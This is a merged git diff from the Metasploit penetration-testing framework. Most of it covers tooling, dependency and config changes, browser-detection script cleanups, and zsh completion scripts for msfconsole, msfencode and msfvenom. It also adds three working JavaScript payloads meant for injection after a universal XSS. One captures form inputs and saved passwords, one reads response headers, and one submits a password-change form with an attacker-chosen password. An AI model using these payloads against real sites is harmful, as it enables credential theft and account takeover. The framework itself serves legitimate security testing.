Land #3906 , Zsh completion for Metasploit

Add CVE-2014-6278 support, lands #3932
Add CVE-2014-6278 support to the exploit module
2014-10-02 11:06:10 -05:00 · 2014-10-01 18:25:41 -05:00 · 2014-10-01 17:58:25 -05:00 · 2014-10-01 17:21:08 -05:00 · 2014-10-01 17:06:59 -05:00 · 2014-10-01 17:00:55 -05:00
683 changed files with 24340 additions and 7545 deletions
@@ -13,6 +13,8 @@ Gemfile.local.lock
 .DS_Store
 # database config for testing
 config/database.yml
+# target config file for testing
+features/support/targets.yml
 # simplecov coverage data
 coverage
 doc/
@@ -50,6 +52,8 @@ tags

 # Rails log directory
 /log
+# Rails tmp directory
+/tmp

 # ignore release/debug folders for exploits
 external/source/exploits/**/Debug
@@ -0,0 +1,79 @@
+# This list was intially created by analyzing the last three months (51
+# modules) committed to Metasploit Framework. Many, many older modules
+# will have offenses, but this should at least provide a baseline for
+# new modules.
+#
+# Updates to this file should include a 'Description' parameter for any
+# explaination needed.
+
+# inherit_from: .rubocop_todo.yml
+
+Style/ClassLength:
+  Description: 'Most Metasploit modules are quite large. This is ok.'
+  Enabled: true
+  Exclude:
+    - 'modules/**/*'
+
+Style/Documentation:
+  Enabled: true
+  Description: 'Most Metasploit modules do not have class documentation.'
+  Exclude:
+    - 'modules/**/*'
+
+Style/Encoding:
+  Enabled: true
+  Description: 'We prefer binary to UTF-8.'
+  EnforcedStyle: 'when_needed'
+
+Style/LineLength:
+  Description: >-
+                  Metasploit modules often pattern match against very
+                  long strings when identifying targets.
+  Enabled: true
+  Max: 180
+
+Style/MethodLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
+# Basically everything in metasploit needs binary encoding, not UTF-8.
+# Disable this here and enforce it through msftidy
+Style/Encoding:
+  Enabled: false
+
+Style/NumericLiterals:
+  Enabled: false
+  Description: 'This often hurts readability for exploit-ish code.'
+
+Style/SpaceInsideBrackets:
+  Enabled: false
+  Description: 'Until module template are final, most modules will fail this.'
+
+Style/StringLiterals:
+  Enabled: false
+  Description: 'Single vs double quote fights are largely unproductive.'
+
+Style/WordArray:
+  Enabled: false
+  Description: 'Metasploit prefers consistent use of []'
+
+Style/RedundantBegin:
+  Exclude:
+    # this pattern is very common and somewhat unavoidable
+    # def run_host(ip)
+    #   begin
+    #     ...
+    #   rescue ...
+    #     ...
+    #   ensure
+    #     disconnect
+    #   end
+    # end
+    - 'modules/**/*'
+
+Documentation:
+  Exclude:
+    - 'modules/**/*'
@@ -39,7 +39,6 @@ SimpleCov.configure do
 	# Other library groups
 	#

-	add_group 'Fastlib', 'lib/fastlib'
 	add_group 'Metasm', 'lib/metasm'
 	add_group 'PacketFu', 'lib/packetfu'
 	add_group 'Rex', 'lib/rex'
@@ -1,3 +1,8 @@
+env:
+  - RAKE_TASK=cucumber
+  - RAKE_TASK=cucumber:boot
+  - RAKE_TASK=spec
+
 language: ruby
 before_install:
  - rake --version
@@ -14,6 +19,7 @@ before_script:
  - bundle exec rake --version
  - bundle exec rake db:create
  - bundle exec rake db:migrate
+script: "bundle exec rake $RAKE_TASK"

 rvm:
  #- '1.8.7'
@@ -3,13 +3,17 @@
 Thanks for your interest in making Metasploit -- and therefore, the
 world -- a better place!

-Are you about to report a bug? If so, please use our [Redmine Bug
-Tracker](https://dev.metasploit.com/redmine/projects/framework). An
-account is required but it only takes a minute or two.
+Are you about to report a bug? Sorry to hear it.

-Are you about to report a security vulnerability in Metasploit?
-If so, please take a look at Rapid's [Vulnerability
-Disclosure Policy](https://www.rapid7.com/disclosure.jsp) policy.
+Here's our [Issue tracker](https://github.com/rapid7/metasploit-framework/issues).
+Please try to be as specific as you can about your problem, include steps
+to reproduce (cut and paste from your console output if it's helpful), and
+what you were expecting to happen.
+
+Are you about to report a security vulnerability in Metasploit itself?
+How ironic! Please take a look at Rapid7's [Vulnerability
+Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
+your report to security@rapid7.com using [our PGP key](http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D).

 Are you about to contribute some new functionality, a bug fix, or a new
 Metasploit module? If so, read on...
@@ -33,7 +37,7 @@ and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-f
 ## Code Contributions

 * **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
-* Similarly, **try** to get Rubocop passing or at least relatively quiet against the files added/modified as part of your contribution
+* *Do* get [Rubocop](https://rubygems.org/search?query=rubocop) relatively quiet against the code you are adding or modifying.
 * **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
 * **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.

@@ -64,18 +68,14 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
 #### Bug Fixes

 * **Do** include reproduction steps in the form of verification steps.
-* **Do** include a link to the corresponding [Redmine](https://dev.metasploit.com/redmine/projects/framework) issue in the format of `SeeRM #1234` in your commit description.
+* **Do** include a link to any corresponding [Issue](https://github.com/rapid7/metasploit-framework/issues) in the format of `See #1234` in your commit description.

 ## Bug Reports

 * **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
-* **Do** create a Redmine account and report your non-vulnerability bugs there.
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
 * **Don't** file duplicate reports - search for your bug before filing a new report.
-* **Don't** report a bug on GitHub. Use [Redmine](https://dev.metasploit.com/redmine/projects/framework) instead.
-
-Redmine issues [#8762](https://dev.metasploit.com/redmine/issues/8762) and [#8764](https://dev.metasploit.com/redmine/issues/8764) are a couple good examples to follow.

 If you need some more guidance, talk to the main body of open
 source contributors over on the [Freenode IRC channel](http://webchat.freenode.net/?channels=%23metasploit&uio=d4)
@@ -6,10 +6,11 @@ gemspec
 group :db do
  # Needed for Msf::DbManager
  gem 'activerecord', '>= 3.0.0', '< 4.0.0'
+
  # Metasploit::Credential database models
-  gem 'metasploit-credential', '>= 0.8.6', '< 0.9'
+  gem 'metasploit-credential', '~> 0.10.1'
  # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.19'
+  gem 'metasploit_data_models', '~> 0.20.1'
  # Needed for module caching in Mdm::ModuleDetails
  gem 'pg', '>= 0.11'
 end
@@ -38,7 +39,7 @@ group :development, :test do
  gem 'rspec', '>= 2.12', '< 3.0.0'
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
-  gem 'rspec-rails' , '>= 2.12', '< 3.0.0'
+  gem 'rspec-rails' , '>= 2.12', '< 3.0.0' 
 end

 group :pcap do
@@ -48,6 +49,10 @@ group :pcap do
 end

 group :test do
+  # cucumber extension for testing command line applications, like msfconsole
+  gem 'aruba'
+  # cucumber + automatic database cleaning with database_cleaner
+  gem 'cucumber-rails', :require => false
  gem 'shoulda-matchers'
  # code coverage for tests
  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
@@ -1,18 +1,19 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.10.0.pre.dev)
+    metasploit-framework (4.10.1.pre.dev)
      actionpack (< 4.0.0)
      activesupport (>= 3.0.0, < 4.0.0)
      bcrypt
+      jsobfu (~> 0.2.0)
      json
-      metasploit-model (~> 0.26.1)
-      meterpreter_bins (= 0.0.6)
+      metasploit-concern (~> 0.2.1)
+      metasploit-model (~> 0.27.1)
+      meterpreter_bins (= 0.0.7)
      msgpack
      nokogiri
      packetfu (= 1.1.9)
      railties
-      rkelly-remix (= 0.0.6)
      robots
      rubyzip (~> 1.1)
      sqlite3
@@ -21,6 +22,9 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
+    actionmailer (3.2.19)
+      actionpack (= 3.2.19)
+      mail (~> 2.5.4)
    actionpack (3.2.19)
      activemodel (= 3.2.19)
      activesupport (= 3.2.19)
@@ -39,15 +43,40 @@ GEM
      activesupport (= 3.2.19)
      arel (~> 3.0.2)
      tzinfo (~> 0.3.29)
+    activeresource (3.2.19)
+      activemodel (= 3.2.19)
+      activesupport (= 3.2.19)
    activesupport (3.2.19)
      i18n (~> 0.6, >= 0.6.4)
      multi_json (~> 1.0)
    arel (3.0.3)
    arel-helpers (2.0.1)
      activerecord (>= 3.1.0, < 5)
+    aruba (0.6.1)
+      childprocess (>= 0.3.6)
+      cucumber (>= 1.1.1)
+      rspec-expectations (>= 2.7.0)
    bcrypt (3.1.7)
    builder (3.0.4)
+    capybara (2.4.1)
+      mime-types (>= 1.16)
+      nokogiri (>= 1.3.3)
+      rack (>= 1.0.0)
+      rack-test (>= 0.5.4)
+      xpath (~> 2.0)
+    childprocess (0.5.3)
+      ffi (~> 1.0, >= 1.0.11)
    coderay (1.1.0)
+    cucumber (1.2.1)
+      builder (>= 2.1.2)
+      diff-lcs (>= 1.1.3)
+      gherkin (~> 2.11.0)
+      json (>= 1.4.6)
+    cucumber-rails (1.4.0)
+      capybara (>= 1.1.2)
+      cucumber (>= 1.2.0)
+      nokogiri (>= 1.5.0)
+      rails (>= 3.0.0)
    diff-lcs (1.2.5)
    erubis (2.7.0)
    factory_girl (4.4.0)
@@ -55,31 +84,44 @@ GEM
    factory_girl_rails (4.4.1)
      factory_girl (~> 4.4.0)
      railties (>= 3.0.0)
+    ffi (1.9.3)
    fivemat (1.2.1)
+    gherkin (2.11.6)
+      json (>= 1.7.6)
    hike (1.2.3)
    i18n (0.6.11)
    journey (1.0.4)
+    jsobfu (0.2.0)
+      rkelly-remix (= 0.0.6)
    json (1.8.1)
-    metasploit-concern (0.1.1)
+    mail (2.5.4)
+      mime-types (~> 1.16)
+      treetop (~> 1.4.8)
+    metasploit-concern (0.2.1)
      activesupport (~> 3.0, >= 3.0.0)
-    metasploit-credential (0.8.6)
-      metasploit-concern (~> 0.1.0)
-      metasploit-model (~> 0.26.1)
-      metasploit_data_models (~> 0.19.4)
+      railties (< 4.0.0)
+    metasploit-credential (0.10.1)
+      metasploit-concern (~> 0.2.1)
+      metasploit-model (~> 0.27.0)
+      metasploit_data_models (~> 0.20.0)
      pg
+      railties (< 4.0.0)
      rubyntlm
      rubyzip (~> 1.1)
-    metasploit-model (0.26.1)
+    metasploit-model (0.27.1)
      activesupport
-    metasploit_data_models (0.19.4)
+      railties (< 4.0.0)
+    metasploit_data_models (0.20.1)
      activerecord (>= 3.2.13, < 4.0.0)
      activesupport
      arel-helpers
-      metasploit-concern (~> 0.1.0)
-      metasploit-model (~> 0.26.1)
+      metasploit-concern (~> 0.2.1)
+      metasploit-model (~> 0.27.0)
      pg
-    meterpreter_bins (0.0.6)
+      railties (< 4.0.0)
+    meterpreter_bins (0.0.7)
    method_source (0.8.2)
+    mime-types (1.25.1)
    mini_portile (0.6.0)
    msgpack (0.5.8)
    multi_json (1.0.4)
@@ -89,6 +131,7 @@ GEM
    packetfu (1.1.9)
    pcaprub (0.11.3)
    pg (0.17.1)
+    polyglot (0.3.5)
    pry (0.10.0)
      coderay (~> 1.1.0)
      method_source (~> 0.8.1)
@@ -100,6 +143,14 @@ GEM
      rack
    rack-test (0.6.2)
      rack (>= 1.0)
+    rails (3.2.19)
+      actionmailer (= 3.2.19)
+      actionpack (= 3.2.19)
+      activerecord (= 3.2.19)
+      activeresource (= 3.2.19)
+      activesupport (= 3.2.19)
+      bundler (~> 1.0)
+      railties (= 3.2.19)
    railties (3.2.19)
      actionpack (= 3.2.19)
      activesupport (= 3.2.19)
@@ -149,7 +200,12 @@ GEM
    thor (0.19.1)
    tilt (1.4.1)
    timecop (0.7.1)
-    tzinfo (0.3.40)
+    treetop (1.4.15)
+      polyglot
+      polyglot (>= 0.3.1)
+    tzinfo (0.3.41)
+    xpath (2.0.0)
+      nokogiri (~> 1.3)
    yard (0.8.7.4)

 PLATFORMS
@@ -157,12 +213,14 @@ PLATFORMS

 DEPENDENCIES
  activerecord (>= 3.0.0, < 4.0.0)
+  aruba
+  cucumber-rails
  factory_girl (>= 4.1.0)
  factory_girl_rails
  fivemat (= 1.2.1)
-  metasploit-credential (>= 0.8.6, < 0.9)
+  metasploit-credential (~> 0.10.1)
  metasploit-framework!
-  metasploit_data_models (~> 0.19)
+  metasploit_data_models (~> 0.20.1)
  network_interface (~> 0.0.1)
  pcaprub
  pg (>= 0.11)
@@ -87,10 +87,6 @@ Files: lib/bit-struct.rb lib/bit-struct/*
 Copyright: 2005-2009, Joel VanderWerf
 License: Ruby

-Files: lib/fastlib.rb
-Copyright: 2011, Rapid7, Inc.
-License: Ruby
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
@@ -9,8 +9,8 @@ module Metasploit::Credential::Core::ToCredential
    
    def to_credential
      Metasploit::Framework::Credential.new(
-        public:       public.try(:username), 
-        private:      private.try(:data), 
+        public:       public.try(:username) || '',
+        private:      private.try(:data)    || '',
        private_type: private.try(:type).try(:demodulize).try(:underscore).try(:to_sym), 
        realm:        realm.try(:value), 
        realm_key:    realm.try(:key),
@@ -26,30 +26,14 @@ require 'action_view/railtie'
 #

 require 'metasploit/framework/common_engine'
-require 'msf/base/config'
+require 'metasploit/framework/database'

 module Metasploit
  module Framework
    class Application < Rails::Application
      include Metasploit::Framework::CommonEngine

-      environment_database_yaml = ENV['MSF_DATABASE_CONFIG']
-
-      if environment_database_yaml
-        # DO NOT check if the path exists: if the environment variable is set, then the user meant to use this path
-        # and if it doesn't exist then an error should occur so the user knows the environment variable points to a
-        # non-existent file.
-        config.paths['config/database'] = environment_database_yaml
-      else
-        user_config_root = Pathname.new(Msf::Config.get_config_root)
-        user_database_yaml = user_config_root.join('database.yml')
-
-        # DO check if the path exists as in test environments there may be no config root, in which case the normal
-        # rails location, `config/database.yml`, should contain the database config.
-        if user_database_yaml.exist?
-          config.paths['config/database'] = [user_database_yaml.to_path]
-        end
-      end
+      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
    end
  end
 end
@@ -0,0 +1,10 @@
+<%
+rerun = File.file?('rerun.txt') ? IO.read('rerun.txt') : ""
+rerun_opts = rerun.to_s.strip.empty? ? "--format #{ENV['CUCUMBER_FORMAT'] || 'progress'} features" : "--format #{ENV['CUCUMBER_FORMAT'] || 'pretty'} #{rerun}"
+std_opts = "--format #{ENV['CUCUMBER_FORMAT'] || 'pretty'} --strict --tags ~@wip"
+ignored_tags = "--tags ~@boot --tags ~@targets"
+%>
+default: <%= std_opts %> <%= ignored_tags %> features
+boot: <%= std_opts %> --tags @boot features
+wip: --tags @wip:3 --wip features
+rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip
@@ -0,0 +1,33 @@
+/* steal_form.js: can be injected into a frame/window after a UXSS */
+/* exploit to steal any autofilled inputs, saved passwords, or any */
+/* data entered into a form.                                       */
+
+/* keep track of what input fields we have discovered */
+var found = {};
+setInterval(function(){
+  /* poll the DOM to check for any new input fields */
+  var inputs = document.querySelectorAll('input,textarea,select');
+  Array.prototype.forEach.call(inputs, function(input) {
+    var val  = input.value||'';
+    var name = input.getAttribute('name')||'';
+    var t    = input.getAttribute('type')||'';
+    if (input.tagName == 'SELECT') {
+      try { val = input.querySelector('option:checked').value }
+      catch (e) {}
+    }
+    if (input.tagName == 'INPUT' && t.toLowerCase()=='hidden') return;
+
+    /* check if this is a valid input/value pair */
+    try {
+      if (val.length && name.length) {
+        if (found[name] != val) {
+
+          /* new input/value discovered, remember it and send it up */
+          found[name] = val;
+          var result = { name: name, value: val, url: window.location.href, send: true };
+          (opener||top).postMessage(JSON.stringify(result), '*');
+        }
+      }
+    } catch (e) {}
+  });
+}, 200);
@@ -0,0 +1,17 @@
+/* steal_headers.js: can be injected into a frame/window after a UXSS */
+/* exploit to steal the response headers of the loaded URL.           */
+
+/* send an XHR request to our current page */
+var x = new XMLHttpRequest;
+x.open('GET', window.location.href, true);
+x.onreadystatechange = function() {
+  /* when the XHR request is complete, grab the headers and send them back */
+  if (x.readyState == 2) {
+    (opener||top).postMessage(JSON.stringify({
+      headers: x.getAllResponseHeaders(),
+      url: window.location.href,
+      send: true
+    }), '*');
+  }
+};
+x.send();
@@ -0,0 +1,36 @@
+/* submit_form.js: can be injected into a frame/window after a UXSS */
+/* exploit to modify and submit a form in the target page.          */
+
+/* modify this hash to your liking */
+var formInfo = {
+
+  /* CSS selector for the form you want to submit */
+  selector: 'form[action="/update_password"]',
+
+  /* inject values into some input fields */
+  inputs: {
+    'user[new_password]': 'pass1234',
+    'user[new_password_confirm]': 'pass1234'
+  }
+}
+
+var c = setInterval(function(){
+  /* find the form... */
+  var form = document.querySelector(formInfo.selector);
+  if (!form) return;
+
+  /* loop over every input field, set the value as specified. */
+  Array.prototype.forEach.call(form.elements, function(input) {
+    var inject = formInfo.inputs[input.name];
+    if (inject) input.setAttribute('value', inject);
+  });
+
+  /* submit the form and clean up */
+  form.submit();
+  clearInterval(c);
+
+  /* report back */
+  var message = "Form submitted to "+form.getAttribute('action');
+  var url = window.location.href;
+  (opener||top).postMessage(JSON.stringify({message: message, url: url}), '*');
+}, 100);
@@ -1,10 +1,10 @@
-window.ie_addons_detect = { };
+var ie_addons_detect = { };

 /**
 * Returns true if this ActiveX is available, otherwise false.
 * Grabbed this directly from browser_autopwn.rb
 **/
-window.ie_addons_detect.hasActiveX = function (axo_name, method) {
+ie_addons_detect.hasActiveX = function (axo_name, method) {
  var axobj = null;
  if (axo_name.substring(0,1) == String.fromCharCode(123)) {
    axobj = document.createElement("object");
@@ -41,7 +41,7 @@ window.ie_addons_detect.hasActiveX = function (axo_name, method) {
 /**
 * Returns the version of Microsoft Office. If not found, returns null.
 **/
-window.ie_addons_detect.getMsOfficeVersion = function () {
+ie_addons_detect.getMsOfficeVersion = function () {
  var version;
  var types = new Array();
  for (var i=1; i <= 5; i++) {
@@ -1,10 +1,10 @@
-window.misc_addons_detect = { };
+var misc_addons_detect = { };


 /**
 * Detects whether the browser supports Silverlight or not
 **/
-window.misc_addons_detect.hasSilverlight = function () {
+misc_addons_detect.hasSilverlight = function () {
 	var found = false;

 	//
@@ -49,7 +49,7 @@ window.misc_addons_detect.hasSilverlight = function () {
 /**
 * Returns the Adobe Flash version
 **/
-window.misc_addons_detect.getFlashVersion = function () {
+misc_addons_detect.getFlashVersion = function () {
 	var foundVersion = null;

 	//
@@ -96,7 +96,7 @@ window.misc_addons_detect.getFlashVersion = function () {
 /**
 * Returns the Java version
 **/
-window.misc_addons_detect.getJavaVersion = function () {
+misc_addons_detect.getJavaVersion = function () {
 	var foundVersion = null;

 	//
@@ -1,28 +1,28 @@

 // Case matters, see lib/msf/core/constants.rb
 // All of these should match up with constants in ::Msf::HttpClients
-clients_opera = "Opera";
-clients_ie    = "MSIE";
-clients_ff    = "Firefox";
-clients_chrome= "Chrome";
-clients_safari= "Safari";
+var clients_opera = "Opera";
+var clients_ie    = "MSIE";
+var clients_ff    = "Firefox";
+var clients_chrome= "Chrome";
+var clients_safari= "Safari";

 // All of these should match up with constants in ::Msf::OperatingSystems
-oses_linux    = "Linux";
-oses_windows  = "Microsoft Windows";
-oses_mac_osx  = "Mac OS X";
-oses_freebsd  = "FreeBSD";
-oses_netbsd   = "NetBSD";
-oses_openbsd  = "OpenBSD";
+var oses_linux    = "Linux";
+var oses_windows  = "Microsoft Windows";
+var oses_mac_osx  = "Mac OS X";
+var oses_freebsd  = "FreeBSD";
+var oses_netbsd   = "NetBSD";
+var oses_openbsd  = "OpenBSD";

 // All of these should match up with the ARCH_* constants
-arch_armle    = "armle";
-arch_x86      = "x86";
-arch_x86_64   = "x86_64";
-arch_ppc      = "ppc";
-arch_mipsle   = "mipsle";
+var arch_armle    = "armle";
+var arch_x86      = "x86";
+var arch_x86_64   = "x86_64";
+var arch_ppc      = "ppc";
+var arch_mipsle   = "mipsle";

-window.os_detect = {};
+var os_detect = {};

 /**
 * This can reliably detect browser versions for IE and Firefox even in the
@@ -30,7 +30,7 @@ window.os_detect = {};
 * requires truthful navigator.appVersion and navigator.userAgent strings in
 * order to be accurate for more than just IE on Windows.
 **/
-window.os_detect.getVersion = function(){
+os_detect.getVersion = function(){
 	//Default values:
 	var os_name;
 	var os_flavor;
@@ -219,7 +219,15 @@ window.os_detect.getVersion = function(){
 		// Thanks to developer.mozilla.org "Firefox for developers" series for most
 		// of these.
 		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
-		if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
+		if ('copyWithin' in Array.prototype) {
+			ua_version = '32.0';
+		} else if ('fill' in Array.prototype) {
+			ua_version = '31.0';
+		} else if (css_is_valid('background-blend-mode', 'backgroundBlendMode', 'multiply')) {
+			ua_version = '30.0';
+		} else if (css_is_valid('box-sizing', 'boxSizing', 'border-box')) {
+			ua_version = '29.0';
+		} else if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
 			ua_version = '28.0';
 		} else if (css_is_valid('cursor', 'cursor', 'grab')) {
 			ua_version = '27.0';
@@ -699,7 +707,7 @@ window.os_detect.getVersion = function(){
 				// Verify whether the ua string is lying by checking if it contains
 				// the major version we detected using known objects above.  If it
 				// appears to be truthful, then use its more precise version number.
-				if (version && version.split(".")[0] == ua_version.split(".")[0]) {
+				if (version && ua_version && version.split(".")[0] == ua_version.split(".")[0]) {
 					// The version number will sometimes end with a space or end of
 					// line, so strip off anything after a space if one exists
 					if (-1 != version.indexOf(" ")) {
@@ -1113,7 +1121,7 @@ window.os_detect.getVersion = function(){
 	return { os_name:os_name, os_flavor:os_flavor, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
 }; // function getVersion

-window.os_detect.searchVersion = function(needle, haystack) {
+os_detect.searchVersion = function(needle, haystack) {
 	var index = haystack.indexOf(needle);
 	var found_version;
 	if (index == -1) { return; }
@@ -1129,7 +1137,7 @@ window.os_detect.searchVersion = function(needle, haystack) {
 /*
 * Return -1 if a < b, 0 if a == b, 1 if a > b
 */
-window.ua_ver_cmp = function(ver_a, ver_b) {
+ua_ver_cmp = function(ver_a, ver_b) {
 	// shortcut the easy case
 	if (ver_a == ver_b) {
 		return 0;
@@ -1173,15 +1181,15 @@ window.ua_ver_cmp = function(ver_a, ver_b) {
 	return 0;
 };

-window.ua_ver_lt = function(a, b) {
+ua_ver_lt = function(a, b) {
 	if (-1 == this.ua_ver_cmp(a,b)) { return true; }
 	return false;
 };
-window.ua_ver_gt = function(a, b) {
+ua_ver_gt = function(a, b) {
 	if (1 == this.ua_ver_cmp(a,b)) { return true; }
 	return false;
 };
-window.ua_ver_eq = function(a, b) {
+ua_ver_eq = function(a, b) {
 	if (0 == this.ua_ver_cmp(a,b)) { return true; }
 	return false;
 };
@@ -3,3 +3,4 @@ admin
 root
 Administrator
 USERID
+guest
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended to check this file into your version control system.

-ActiveRecord::Schema.define(:version => 20140801150537) do
+ActiveRecord::Schema.define(:version => 20140905031549) do

  create_table "api_keys", :force => true do |t|
    t.text     "token"
@@ -125,6 +125,7 @@ ActiveRecord::Schema.define(:version => 20140801150537) do
    t.integer  "host_detail_count",                      :default => 0
    t.integer  "exploit_attempt_count",                  :default => 0
    t.integer  "cred_count",                             :default => 0
+    t.string   "detected_arch"
  end

  add_index "hosts", ["name"], :name => "index_hosts_on_name"
@@ -7,7 +7,7 @@ CLASSES = Exploit.java
 all: $(CLASSES:.java=.class)

 install:
-	mv *.class ../../../../data/exploits/CVE-2013-3465/
+	mv *.class ../../../../data/exploits/CVE-2013-2465/

 clean:
 	rm -rf *.class
@@ -0,0 +1,3 @@
+Metasploit completion definitions for zsh. The directory containing the
+completion files needs to be added to the ```$fpath``` environment variable,
+this is usually done in the ```~/.zshrc``` file.
@@ -0,0 +1,39 @@
+#compdef msfconsole
+# ------------------------------------------------------------------------------
+# License
+# -------
+# This file is part of the Metasploit Framework and is released under the MSF
+# License, please see the COPYING file for more details.
+#
+# ------------------------------------------------------------------------------
+# Description
+# -----------
+#
+#  Completion script for the Metasploit Framework's msfconsole command
+#  (http://www.metasploit.com/).
+#
+# ------------------------------------------------------------------------------
+# Authors
+# -------
+#
+#  * Spencer McIntyre
+#
+# ------------------------------------------------------------------------------
+
+_arguments \
+  {-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \
+  "-c[Load the specified configuration file]:configuration file:_files" \
+  {-d,--defanged}"[Execute the console as defanged]" \
+  {-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \
+  {-h,--help}"[Show help text]" \
+  {-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \
+  {-M,--migration-path}"[Specify a directory containing additional DB migrations]:directory:_files -/" \
+  {-m,--module-path}"[Specifies an additional module search path]:search path:_files -/" \
+  {-n,--no-database}"[Disable database support]" \
+  {-o,--output}"[Output to the specified file]:output file" \
+  {-p,--plugin}"[Load a plugin on startup]:plugin file:_files" \
+  {-q,--quiet}"[Do not print the banner on start up]" \
+  {-r,--resource}"[Execute the specified resource file]:resource file:_files" \
+  {-v,--version}"[Show version]" \
+  {-x,--execute-command}"[Execute the specified string as console commands]:commands" \
+  {-y,--yaml}"[Specify a YAML file containing database settings]:yaml file:_files"
@@ -0,0 +1,82 @@
+#compdef msfencode
+# ------------------------------------------------------------------------------
+# License
+# -------
+# This file is part of the Metasploit Framework and is released under the MSF
+# License, please see the COPYING file for more details.
+#
+# ------------------------------------------------------------------------------
+# Description
+# -----------
+#
+#  Completion script for the Metasploit Framework's msfencode command
+#  (http://www.metasploit.com/).
+#
+# ------------------------------------------------------------------------------
+# Authors
+# -------
+#
+#  * Spencer McIntyre
+#
+# ------------------------------------------------------------------------------
+
+_msfencode_encoders_list=(
+  'cmd/generic_sh'
+  'cmd/ifs'
+  'cmd/powershell_base64'
+  'cmd/printf_php_mq'
+  'generic/eicar'
+  'generic/none'
+  'mipsbe/byte_xori'
+  'mipsbe/longxor'
+  'mipsle/byte_xori'
+  'mipsle/longxor'
+  'php/base64'
+  'ppc/longxor'
+  'ppc/longxor_tag'
+  'sparc/longxor_tag'
+  'x64/xor'
+  'x86/add_sub'
+  'x86/alpha_mixed'
+  'x86/alpha_upper'
+  'x86/avoid_underscore_tolower'
+  'x86/avoid_utf8_tolower'
+  'x86/bloxor'
+  'x86/call4_dword_xor'
+  'x86/context_cpuid'
+  'x86/context_stat'
+  'x86/context_time'
+  'x86/countdown'
+  'x86/fnstenv_mov'
+  'x86/jmp_call_additive'
+  'x86/nonalpha'
+  'x86/nonupper'
+  'x86/opt_sub'
+  'x86/shikata_ga_nai'
+  'x86/single_static_bit'
+  'x86/unicode_mixed'
+  'x86/unicode_upper'
+)
+
+_msfencode_encoder() {
+  _describe -t encoders 'available encoders' _msfencode_encoders_list || compadd "$@"
+}
+
+_arguments \
+  "-a[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
+  "-b[The list of characters to avoid, example: '\x00\xff']:bad characters" \
+  "-c[The number of times to encode the data]:times" \
+  "-d[Specify the directory in which to look for EXE templates]:template file:_files -/" \
+  "-e[The encoder to use]:encoder:_msfencode_encoder" \
+  "-h[Help banner]" \
+  "-i[Encode the contents of the supplied file path]:input file:_files" \
+  "-k[Keep template working; run payload in new thread (use with -x)]" \
+  "-l[List available encoders]" \
+  "-m[Specifies an additional module search path]:module path:_files -/" \
+  "-n[Dump encoder information]" \
+  "-o[The output file]:output file" \
+  "-p[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
+  "-s[The maximum size of the encoded data]:maximum size" \
+  "-t[The output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
+  "-v[Increase verbosity]" \
+  "-x[Specify an alternate executable template]:template file:_files"
@@ -0,0 +1,81 @@
+#compdef msfvenom
+# ------------------------------------------------------------------------------
+# License
+# -------
+# This file is part of the Metasploit Framework and is released under the MSF
+# License, please see the COPYING file for more details.
+#
+# ------------------------------------------------------------------------------
+# Description
+# -----------
+#
+#  Completion script for the Metasploit Framework's msfvenom command
+#  (http://www.metasploit.com/).
+#
+# ------------------------------------------------------------------------------
+# Authors
+# -------
+#
+#  * Spencer McIntyre
+#
+# ------------------------------------------------------------------------------
+
+_msfvenom_encoders_list=(
+  'cmd/generic_sh'
+  'cmd/ifs'
+  'cmd/powershell_base64'
+  'cmd/printf_php_mq'
+  'generic/eicar'
+  'generic/none'
+  'mipsbe/byte_xori'
+  'mipsbe/longxor'
+  'mipsle/byte_xori'
+  'mipsle/longxor'
+  'php/base64'
+  'ppc/longxor'
+  'ppc/longxor_tag'
+  'sparc/longxor_tag'
+  'x64/xor'
+  'x86/add_sub'
+  'x86/alpha_mixed'
+  'x86/alpha_upper'
+  'x86/avoid_underscore_tolower'
+  'x86/avoid_utf8_tolower'
+  'x86/bloxor'
+  'x86/call4_dword_xor'
+  'x86/context_cpuid'
+  'x86/context_stat'
+  'x86/context_time'
+  'x86/countdown'
+  'x86/fnstenv_mov'
+  'x86/jmp_call_additive'
+  'x86/nonalpha'
+  'x86/nonupper'
+  'x86/opt_sub'
+  'x86/shikata_ga_nai'
+  'x86/single_static_bit'
+  'x86/unicode_mixed'
+  'x86/unicode_upper'
+)
+
+_msfvenom_encoder() {
+  _describe -t encoders 'available encoders' _msfvenom_encoders_list || compadd "$@"
+}
+
+_arguments \
